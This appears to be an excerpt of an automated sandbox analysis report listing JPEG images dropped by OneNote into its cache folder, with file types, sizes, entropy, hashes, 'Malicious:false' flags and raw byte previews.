                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22203
                                                                                                                                                                                                                  Entropy (8bit):6.977175130747846
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                                                                                                  MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                                                                                                  SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                                                                                                  SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                                                                                                  SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006N.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):52945
                                                                                                                                                                                                                  Entropy (8bit):7.6490972666456765
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                                                                                                  MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                                                                                                  SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                                                                                                  SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                                                                                                  SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006P.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):25622
                                                                                                                                                                                                                  Entropy (8bit):7.058784902089801
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                                                                                                  MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                                                                                                  SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                                                                                                  SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                                                                                                  SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006R.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):15740
                                                                                                                                                                                                                  Entropy (8bit):6.0674556182683945
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                                                                                                  MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                                                                                                  SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                                                                                                  SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                                                                                                  SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006T.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55804
                                                                                                                                                                                                                  Entropy (8bit):7.433623355028275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                                                                                                  MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                                                                                                  SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                                                                                                  SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                                                                                                  SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006V.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):41893
                                                                                                                                                                                                                  Entropy (8bit):7.52654558351485
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                                                                                                  MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                                                                                                  SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                                                                                                  SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                                                                                                  SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000071.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14177
                                                                                                                                                                                                                  Entropy (8bit):5.705782002886174
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                                                                                                  MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                                                                                                  SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                                                                                                  SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                                                                                                  SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000074.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12654
                                                                                                                                                                                                                  Entropy (8bit):7.745439197485533
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                                                                                                                                  MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                                                                                                                                  SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                                                                                                                                  SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                                                                                                                                  SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000076.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2695
                                                                                                                                                                                                                  Entropy (8bit):7.434963358385164
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                                                                                                                                  MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                                                                                                                                  SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                                                                                                                                  SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                                                                                                                                  SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000078.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11040
                                                                                                                                                                                                                  Entropy (8bit):7.929583162638891
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                                                                                                                                  MD5:02775A1E41CF53AC771D820003903913
                                                                                                                                                                                                                  SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                                                                                                                                  SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                                                                                                                                  SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007A.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2268
                                                                                                                                                                                                                  Entropy (8bit):7.384274251000273
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                                                                                                                                  MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                                                                                                                                  SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                                                                                                                                  SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                                                                                                                                  SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007B.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):784
                                                                                                                                                                                                                  Entropy (8bit):6.962539208465222
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                                                                                                                                  MD5:14105A831FE32590E52C2E2E41879624
                                                                                                                                                                                                                  SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                                                                                                                                  SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                                                                                                                                  SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007D.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3009
                                                                                                                                                                                                                  Entropy (8bit):7.493528353751471
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                                                                                                                                  MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                                                                                                                                  SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                                                                                                                                  SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                                                                                                                                  SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                                                                                                                                  Malicious:false
